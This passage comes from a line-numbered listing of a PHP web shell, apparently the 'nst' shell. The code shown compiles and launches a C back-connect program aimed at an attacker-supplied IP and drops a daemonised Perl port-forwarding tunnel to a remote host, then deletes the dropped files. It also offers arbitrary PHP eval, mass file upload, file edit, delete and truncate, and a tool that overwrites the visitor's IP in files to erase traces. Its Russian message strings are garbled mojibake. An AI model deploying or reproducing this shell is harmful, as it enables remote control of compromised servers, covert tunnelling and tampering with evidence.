  1440. $fp=fopen("/tmp/nst_c_bc_c.c","w");
  1441. $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
  1442. fwrite($fp,"$bc_c_scp");
  1443. passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
  1444. passthru("nohup /tmp/nst_bc_c $ip &");
  1445. unlink("/tmp/nst_bc_c");
  1446. unlink("/tmp/nst_bc_c.c");
  1447. }else{
  1448. if(is_writable(".")){
  1449. mkdir(".nst_bc_c_tmp");
  1450. $fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
  1451. $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
  1452. fwrite($fp,"$bc_c_scp");
  1453. passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
  1454. passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
  1455. unlink(".nst_bc_c_tmp/nst_bc_c.c");
  1456. unlink(".nst_bc_c_tmp/nst_bc_c");
  1457. rmdir(".nst_bc_c_tmp");
  1458. }
  1459. }
  1460. $show_ps="1";
  1461.  
  1462. }#end of back connect C
  1463.  
  1464.  
  1465. if($_POST['datapipe_pl']){
  1466. $port_2=$_POST['port_2'];
  1467. $port_3=$_POST['port_3'];
  1468. $ip=$_POST['ip'];
  1469. $datapipe_pl = "
  1470. #!/usr/bin/perl
  1471. # coded by CuTTer (rus hacker)
  1472. use IO::Socket;
  1473. use POSIX;
  1474.  
  1475. \$localport=$port_2;
  1476. \$host=\"$ip\";
  1477. \$port=$port_3;
  1478.  
  1479. \$daemon=1;
  1480.  
  1481. \$DIR = undef;
  1482.  
  1483.  
  1484. \$log=0;
  1485.  
  1486.  
  1487.  
  1488.  
  1489. \$| = 1;
  1490.  
  1491. if (\$daemon){
  1492.        print \"3anycKaeM daemon\n\";
  1493.  
  1494.        \$pid = fork;
  1495.        exit if \$pid;
  1496.        die \"Couldn't fork: \$!\" unless defined(\$pid);
  1497.        POSIX::setsid() or die \"Can't start a new session: \$!\";
  1498. }
  1499.  
  1500. %o = ('port' => \$localport,
  1501.          'toport' => \$port,
  1502.          'tohost' => \$host);
  1503.  
  1504. \$ah = IO::Socket::INET->new(
  1505.                         'LocalPort' => \$localport,
  1506.                         'Reuse' => 1,
  1507.                         'Listen' => 10)
  1508.    || die \"・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス ・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス: \$!\";
  1509.  
  1510. print \"・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス.\n\" if \$log;
  1511. \$SIG{'CHLD'} = 'IGNORE';
  1512. \$num = 0;
  1513. while (1) {
  1514.        \$ch = \$ah->accept();
  1515.        if (!\$ch) {
  1516.                print STDERR \"・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス accept: \$!\n\";
  1517.                next;
  1518.        }
  1519.  
  1520.        printf(\"・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス: host %s, port %s.\n\",
  1521.        \$ch->peerhost(), \$ch->peerport()) if \$log;
  1522.        ++\$num;
  1523.        \$pid = fork();
  1524.        if (!defined(\$pid)) {
  1525.                print STDERR \"・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス fork: \$!\n\";
  1526.    } elsif (\$pid == 0) {
  1527. ## ・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス
  1528.                \$ah->close();
  1529.                Run(\%o, \$ch, \$num);
  1530.        } else {
  1531.                print \"Parent: Fork ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス, ・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス.\n\" if \$log;
  1532.                \$ch->close();
  1533.        }
  1534. }
  1535.  
  1536.  
  1537. sub Run {
  1538.        my(\$o, \$ch, \$num) = @_;
  1539.        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
  1540.                                                        'PeerPort' => \$o->{'toport'});
  1541.        print(\"Child: ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス \$o->{'tohost'}, ・ス・ス・ス・ス \$o->{'toport'}.\n\") if \$log;
  1542.        if (!\$th) {
  1543.                printf STDERR (\"Child: ・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス %s, ・ス・ス・ス・ス %s.\n\",
  1544.                \$o->{'tohost'}, \$o->{'toport'});
  1545.                exit 0;
  1546.        }
  1547.  
  1548.        my \$fh;
  1549.        if (\$o->{'dir'}) {
  1550.                \$fh = Symbol::gensym();
  1551.                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
  1552.                or die \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス ・ス・ス・ス・ス・ス \$o->{'dir'}/tunnel\$num.log: \$!\";
  1553.        }
  1554.  
  1555.        \$ch->autoflush();
  1556.        \$th->autoflush();
  1557.        while (\$ch || \$th) {
  1558.                print \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス.\n\" if \$log;
  1559.                my \$rin = \"\";
  1560.                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
  1561.                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
  1562.                my(\$rout, \$eout);
  1563.                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
  1564.                if (!\$rout  &&  !\$eout) {
  1565.                        print STDERR \"Child: ・ス・ス・ス・ス・ス・ス Timeout.\n\";
  1566.                }
  1567.                my \$cbuffer = \"\";
  1568.                my \$tbuffer = \"\";
  1569.  
  1570.                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
  1571.                        print \"Child: ・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス ・ス・ス ・ス・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1572.                        my \$result = sysread(\$ch, \$tbuffer, 1024);
  1573.                        if (!defined(\$result)) {
  1574.                                print STDERR \"Child: ・ス・ス・ス・ス・ス・ス ・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス: \$!\n\";
  1575.                                exit 0;
  1576.                        }
  1577.                        if (\$result == 0) {
  1578.                                print \"Child: ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1579.                                exit 0;
  1580.                        }
  1581.  
  1582.                        print \"Child: ・ス・ス・ス・ス・ス・ス: \$cbuffer\n\" if \$log;
  1583.                }
  1584.  
  1585.                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
  1586.                        print \"Child: ・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1587.                        my \$result = sysread(\$th, \$cbuffer, 1024);
  1588.                        if (!defined(\$result)) {
  1589.                                print STDERR \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス: \$!\n\";
  1590.                                exit 0;
  1591.                        }
  1592.  
  1593.                        if (\$result == 0) {
  1594.                                print \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1595.                                exit 0;
  1596.                        }
  1597.  
  1598.                        print \"Child: ・ス・ス・ス・ス・ス・ス: \$cbuffer\n\" if \$log;
  1599.            }
  1600.  
  1601.                if (\$fh  &&  \$tbuffer) {
  1602.                        (print \$fh \$tbuffer);
  1603.                }
  1604.  
  1605.                while (my \$len = length(\$tbuffer)) {
  1606.                        print \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス \$len ・ス・ス・ス・ス.\n\" if \$log;
  1607.                        my \$res = syswrite(\$th, \$tbuffer, \$len);
  1608.                        print \"Child: ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1609.                        if (\$res > 0) {
  1610.                                \$tbuffer = substr(\$tbuffer, \$res);
  1611.                        } else {
  1612.                                print STDERR \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス: \$!\n\";
  1613.                        }
  1614.                }
  1615.  
  1616.                while (my \$len = length(\$cbuffer)) {
  1617.                        print \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス \$len ・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス.\n\" if \$log;
  1618.                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
  1619.                        print \"Child: ・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス..\n\" if \$log;
  1620.                        if (\$res > 0) {
  1621.                                \$cbuffer = substr(\$cbuffer, \$res);
  1622.                        } else {
  1623.                                print STDERR \"Child: ・ス・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス・ス・ス・ス ・ス・ス・ス・ス・ス・ス: \$!\n\";
  1624.                        }
  1625.                }
  1626.        }
  1627. }
  1628.  
  1629. ";
  1630.  
  1631. if(is_writable("/tmp")){
  1632. $fp=fopen("/tmp/nst_perl_datapipe.pl","w");
  1633. fwrite($fp,"$datapipe_pl");
  1634. passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
  1635. unlink("/tmp/nst_perl_datapipe.pl");
  1636. }else{
  1637. if(is_writable(".")){
  1638. mkdir(".nst_datapipe_tmp");
  1639. $fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
  1640. fwrite($fp,"$datapipe_pl");
  1641. passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
  1642. unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
  1643. rmdir(".nst_datapipe_tmp");
  1644. }
  1645. }
  1646. $show_ps="1";
  1647.  
  1648. }#end of datapipe perl
  1649.  
  1650.  
  1651.  
  1652.  
  1653.  
  1654. if($show_ps=="1"){
  1655. print "<center><b>[ps ux]</b></center><br><br>";
  1656. print "<pre>";
  1657. passthru("ps ux");
  1658. print "</pre><br><br>";
  1659. }
  1660.  
  1661.  
  1662.  
  1663. echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
  1664. <Br>
  1665. md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
  1666. </form>
  1667. ";
  1668. @$md5=@$_POST['md5'];
  1669. if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
  1670. echo "<br>
  1671. <form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
  1672. if(@$_POST['base64']){
  1673. @$base64=$_POST['base64'];
  1674. echo "
  1675. <b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
  1676. Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
  1677. echo "<br>
  1678. <form method=post><b>DES:</b><br><input name=des size=30><br>
  1679. John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
  1680. if(@$_POST['des']){
  1681. @$des=@$_POST['des'];
  1682. echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
  1683.  
  1684. print "
  1685. <b>eval:</b<br>
  1686. (example: print \"Hello World\";)
  1687. <form method=post>
  1688. <font color=red><b>&lt;?</b><br>
  1689. <textarea name=eval rows=15 cols=113></textarea><br>
  1690. <b>?&gt;</b></font><br>
  1691. <input type=submit value=Run style='width:150px;'>
  1692. </form><br>
  1693. ";
  1694.  
  1695. function eval_sl($editf){
  1696. if(get_magic_quotes_gpc()==1){
  1697. $editf=stripslashes($editf);
  1698. }
  1699. return $editf;
  1700. }
  1701.  
  1702.  
  1703. if($_POST['eval']){
  1704. print "<b>RESULT:<br><br></b>";
  1705. eval(eval_sl($_POST['eval']));
  1706. print "<br><br>";
  1707.  
  1708. print "<font color=green><b>PHP:</b><br>\r\n\r\n";
  1709. print "&lt;?\r\n";
  1710. print "<br>";
  1711. print htmlspecialchars(eval_sl(($_POST['eval'])));
  1712. print "<br>";
  1713. print "?&gt;\r\n\r\n</font><br><br>";
  1714.  
  1715. }
  1716.  
  1717. echo $copyr;
  1718. exit;}
  1719.  
  1720. if(@$_GET['replace']=="1"){
  1721. $ip=@$_SERVER['REMOTE_ADDR'];
  1722. $d=$_GET['d'];
  1723. $e=$_GET['e'];
  1724. @$de=$d."/".$e;
  1725. $de=str_replace("//","/",$de);
  1726. $e=@$e;
  1727. echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
  1728. echo "
  1729. Replace tool:<br>
  1730. (You can replace any text)<br>
  1731. File: $de<br>
  1732. <form method=post>
  1733. 1. Your ip.<br>
  1734. 2. microsoft.com ip :)<br>
  1735. Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
  1736. <input type=submit name=doit value=Replace>
  1737. </form>
  1738. ";
  1739.  
  1740. if(@$_POST['doit']){
  1741. @$thisX=$_POST['thisX'];
  1742. @$bythis=$_POST['bythis'];
  1743. @$e=$_GET['e'];
  1744. $filename="$d/$e";
  1745. $fd = @fopen ($filename, "r");
  1746. $rpl = @fread ($fd, @filesize ($filename));
  1747. $re=str_replace("$thisX","$bythis",$rpl);
  1748. $x=@fopen("$d/$e","w");
  1749. @fwrite($x,"$re");
  1750. echo "<br><center>$thisX Replaced by $bythis<br>
  1751. [<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
  1752.  
  1753. }
  1754. echo $copyr;
  1755. exit;}
  1756.  
  1757.  
  1758. if(@$_GET['t']=="upload"){
  1759. echo "<br>
  1760. <a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
  1761. File upload:<br>
  1762. <form enctype=\"multipart/form-data\" method=post>
  1763. <input type=file name=text size=50><br>
  1764. <input name=where size=52 value='$d'><br>
  1765. New file name:<br>
  1766. <input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
  1767. <input type=submit value=Upload name=uploadf>
  1768. </form><br>
  1769. ";
  1770.  
  1771. if(@$_POST['uploadf']){
  1772. $where=$_POST['where'];
  1773. $newf=$_POST['newf'];
  1774. $where=str_replace("//","/",$where);
  1775. if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
  1776. $uploadfile = "$where/".$newf;
  1777. if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
  1778. $uploadfile=str_replace("//","/",$uploadfile);
  1779. echo "<i><br>Uploaded to $uploadfile</i><br>";
  1780. }else{
  1781. echo "<i><br>Error</i><br>";}
  1782. }
  1783. }
  1784.  
  1785. if(@$_GET['t']=="massupload"){
  1786. echo "
  1787. Mass upload:<br>
  1788. <form enctype=\"multipart/form-data\" method=post>
  1789. <input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
  1790. <input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
  1791. <input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
  1792. <input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
  1793. <input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
  1794. <input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
  1795. <input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
  1796. <input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
  1797. <input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
  1798. <input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
  1799. <input name=where size=43 value='$d'><br>
  1800. <input type=submit value=Upload name=massupload>
  1801. </form><br>";
  1802.  
  1803. if(@$_POST['massupload']){
  1804. $where=@$_POST['where'];
  1805. $uploadfile1 = "$where/".@$_FILES['text1']['name'];
  1806. $uploadfile2 = "$where/".@$_FILES['text2']['name'];
  1807. $uploadfile3 = "$where/".@$_FILES['text3']['name'];
  1808. $uploadfile4 = "$where/".@$_FILES['text4']['name'];
  1809. $uploadfile5 = "$where/".@$_FILES['text5']['name'];
  1810. $uploadfile6 = "$where/".@$_FILES['text6']['name'];
  1811. $uploadfile7 = "$where/".@$_FILES['text7']['name'];
  1812. $uploadfile8 = "$where/".@$_FILES['text8']['name'];
  1813. $uploadfile9 = "$where/".@$_FILES['text9']['name'];
  1814. $uploadfile10 = "$where/".@$_FILES['text10']['name'];
  1815. $uploadfile11 = "$where/".@$_FILES['text11']['name'];
  1816. $uploadfile12 = "$where/".@$_FILES['text12']['name'];
  1817. $uploadfile13 = "$where/".@$_FILES['text13']['name'];
  1818. $uploadfile14 = "$where/".@$_FILES['text14']['name'];
  1819. $uploadfile15 = "$where/".@$_FILES['text15']['name'];
  1820. $uploadfile16 = "$where/".@$_FILES['text16']['name'];
  1821. $uploadfile17 = "$where/".@$_FILES['text17']['name'];
  1822. $uploadfile18 = "$where/".@$_FILES['text18']['name'];
  1823. $uploadfile19 = "$where/".@$_FILES['text19']['name'];
  1824. $uploadfile20 = "$where/".@$_FILES['text20']['name'];
  1825. if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
  1826. $where=str_replace("\\\\","\\",$where);
  1827. echo "<i>Uploaded to $uploadfile1</i><br>";}
  1828. if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
  1829. $where=str_replace("\\\\","\\",$where);
  1830. echo "<i>Uploaded to $uploadfile2</i><br>";}
  1831. if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
  1832. $where=str_replace("\\\\","\\",$where);
  1833. echo "<i>Uploaded to $uploadfile3</i><br>";}
  1834. if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
  1835. $where=str_replace("\\\\","\\",$where);
  1836. echo "<i>Uploaded to $uploadfile4</i><br>";}
  1837. if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
  1838. $where=str_replace("\\\\","\\",$where);
  1839. echo "<i>Uploaded to $uploadfile5</i><br>";}
  1840. if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
  1841. $where=str_replace("\\\\","\\",$where);
  1842. echo "<i>Uploaded to $uploadfile6</i><br>";}
  1843. if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
  1844. $where=str_replace("\\\\","\\",$where);
  1845. echo "<i>Uploaded to $uploadfile7</i><br>";}
  1846. if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
  1847. $where=str_replace("\\\\","\\",$where);
  1848. echo "<i>Uploaded to $uploadfile8</i><br>";}
  1849. if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
  1850. $where=str_replace("\\\\","\\",$where);
  1851. echo "<i>Uploaded to $uploadfile9</i><br>";}
  1852. if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
  1853. $where=str_replace("\\\\","\\",$where);
  1854. echo "<i>Uploaded to $uploadfile10</i><br>";}
  1855. if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
  1856. $where=str_replace("\\\\","\\",$where);
  1857. echo "<i>Uploaded to $uploadfile11</i><br>";}
  1858. if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
  1859. $where=str_replace("\\\\","\\",$where);
  1860. echo "<i>Uploaded to $uploadfile12</i><br>";}
  1861. if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
  1862. $where=str_replace("\\\\","\\",$where);
  1863. echo "<i>Uploaded to $uploadfile13</i><br>";}
  1864. if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
  1865. $where=str_replace("\\\\","\\",$where);
  1866. echo "<i>Uploaded to $uploadfile14</i><br>";}
  1867. if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
  1868. $where=str_replace("\\\\","\\",$where);
  1869. echo "<i>Uploaded to $uploadfile15</i><br>";}
  1870. if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
  1871. $where=str_replace("\\\\","\\",$where);
  1872. echo "<i>Uploaded to $uploadfile16</i><br>";}
  1873. if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
  1874. $where=str_replace("\\\\","\\",$where);
  1875. echo "<i>Uploaded to $uploadfile17</i><br>";}
  1876. if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
  1877. $where=str_replace("\\\\","\\",$where);
  1878. echo "<i>Uploaded to $uploadfile18</i><br>";}
  1879. if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
  1880. $where=str_replace("\\\\","\\",$where);
  1881. echo "<i>Uploaded to $uploadfile19</i><br>";}
  1882. if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
  1883. $where=str_replace("\\\\","\\",$where);
  1884. echo "<i>Uploaded to $uploadfile20</i><br>";}
  1885. }
  1886. echo $copyr;
  1887. exit;}
  1888.  
  1889. if(@$_GET['yes']=="yes"){
  1890. $d=@$_GET['d']; $e=@$_GET['e'];
  1891. unlink($d."/".$e);
  1892. $delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
  1893. }
  1894. if(@$_GET['clean']=="1"){
  1895. @$e=$_GET['e'];
  1896. $x=fopen("$d/$e","w");
  1897. fwrite($x,"");
  1898. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
  1899. exit;
  1900. }
  1901.  
  1902.  
  1903. if(@$_GET['e']){
  1904. $d=@$_GET['d'];
  1905. $e=@$_GET['e'];
  1906. $pinf=pathinfo($e);
  1907. if(in_array(".".@$pinf['extension'],$images)){
  1908. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
  1909. exit;}
  1910. $filename="$d/$e";
  1911. $fd = @fopen ($filename, "r");
  1912. $c = @fread ($fd, @filesize ($filename));
  1913. $c=htmlspecialchars($c);
  1914. $de=$d."/".$e;
  1915. $de=str_replace("//","/",$de);
  1916. if(is_file($de)){
  1917. if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
  1918. echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
  1919. echo "
  1920. File contents:<br>
  1921. $de
  1922. <br>
  1923. <table width=100% border=1 cellpadding=0 cellspacing=0>
  1924. <tr><td><pre>
  1925. $c
  1926.  
  1927. </pre></td></tr>
  1928. </table>
  1929.  
  1930. ";
  1931.  
  1932. if(@$_GET['delete']=="1"){
  1933. $delete=$_GET['delete'];
  1934. echo "
  1935. DELETE: Are you sure?<br>
  1936. <a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
  1937. <br>
  1938. ";
  1939. if(@$_GET['yes']=="yes"){
  1940. @$d=$_GET['d']; @$e=$_GET['e'];
  1941. echo $delresult;
  1942. }
  1943. if(@$_GET['no']){
  1944. echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
  1945. ";
  1946. }
  1947.  
  1948.  
  1949. } #end of delete
  1950. echo $copyr;
  1951. exit;
  1952. } #end of e
  1953.  
  1954. if(@$_GET['edit']=="1"){
  1955. @$d=$_GET['d'];
  1956. @$ef=$_GET['ef'];
  1957. $e=$ef;
  1958. if(is_file($d."/".$ef)){
  1959. if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
  1960. echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
  1961. $filename="$d/$ef";
  1962. $fd = @fopen ($filename, "r");
  1963. $c = @fread ($fd, @filesize ($filename));
  1964. $c=htmlspecialchars($c);
  1965. $de=$d."/".$ef;
  1966. $de=str_replace("//","/",$de);
  1967. echo "
  1968. Edit:<br>
  1969. $de<br>";
  1970.  
  1971. if(!@$_POST['save']){
  1972. print "
  1973. <form method=post>
  1974. <input name=filename value='$d/$ef'>
  1975. <textarea cols=143 rows=30 name=editf>$c</textarea>
  1976. <br>
  1977. <input type=submit name=save value='Save changes'></form><br>
  1978. ";
  1979. }
  1980. if(@$_POST['save']){
  1981. $editf=@$_POST['editf'];
  1982.  
  1983. if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
  1984. $editf=stripslashes($editf);
  1985. }
  1986.  
  1987. $f=fopen($filename,"w+");
  1988. fwrite($f,"$editf");
  1989. echo "<br>
  1990. <b>File edited.</b>
  1991. <meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
  1992. exit;
  1993. }
  1994. echo $copyr;
  1995. exit;
  1996. }
  1997.  
  1998.  
  1999.  
  2000. echo"
  2001. <table width=100% cellpadding=1 cellspacing=0 class=hack>
  2002. <tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
  2003. ";
  2004. $dirs=array();
  2005. $files=array();
  2006. $dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
  2007. while (!(($file = readdir($dh)) === false)) {
  2008. if ($file=="." || $file=="..") continue;
  2009. if (@is_dir("$d/$file")) {
  2010.       $dirs[]=$file;
  2011. }else{
  2012.       $files[]=$file;
  2013.       }
  2014.    sort($dirs);
  2015.    sort($files);
  2016.  
  2017. $fz=@filesize("$d/$file");
  2018. }
  2019.  
  2020. function perm($perms){
  2021. if (($perms & 0xC000) == 0xC000) {
  2022.    $info = 's';
  2023. } elseif (($perms & 0xA000) == 0xA000) {
  2024.    $info = 'l';
  2025. } elseif (($perms & 0x8000) == 0x8000) {
  2026.    $info = '-';
  2027. } elseif (($perms & 0x6000) == 0x6000) {
  2028.    $info = 'b';
  2029. } elseif (($perms & 0x4000) == 0x4000) {
  2030.    $info = 'd';
  2031. } elseif (($perms & 0x2000) == 0x2000) {
  2032.    $info = 'c';
  2033. } elseif (($perms & 0x1000) == 0x1000) {
  2034.    $info = 'p';
  2035. } else {
  2036.    $info = 'u';
  2037. }
  2038. $info .= (($perms & 0x0100) ? 'r' : '-');
  2039. $info .= (($perms & 0x0080) ? 'w' : '-');
  2040. $info .= (($perms & 0x0040) ?
  2041.            (($perms & 0x0800) ? 's' : 'x' ) :
  2042.            (($perms & 0x0800) ? 'S' : '-'));
  2043. $info .= (($perms & 0x0020) ? 'r' : '-');
  2044. $info .= (($perms & 0x0010) ? 'w' : '-');
  2045. $info .= (($perms & 0x0008) ?
  2046.            (($perms & 0x0400) ? 's' : 'x' ) :
  2047.            (($perms & 0x0400) ? 'S' : '-'));
  2048. $info .= (($perms & 0x0004) ? 'r' : '-');
  2049. $info .= (($perms & 0x0002) ? 'w' : '-');
  2050. $info .= (($perms & 0x0001) ?
  2051.            (($perms & 0x0200) ? 't' : 'x' ) :
  2052.            (($perms & 0x0200) ? 'T' : '-'));
  2053. return $info;
  2054. }
  2055.  
  2056.  
  2057. for($i=0; $i<count($dirs); $i++){
  2058.  
  2059. $perms = @fileperms($d."/".$dirs[$i]);
  2060. $owner = @fileowner($d."/".$dirs[$i]);
  2061. if($os=="unix"){
  2062. $fileownera=posix_getpwuid($owner);
  2063. $owner=$fileownera['name'];
  2064. }
  2065. $group = @filegroup($d."/".$dirs[$i]);
  2066. if($os=="unix"){
  2067. $groupinfo = posix_getgrgid($group);
  2068. $group=$groupinfo['name'];
  2069. }
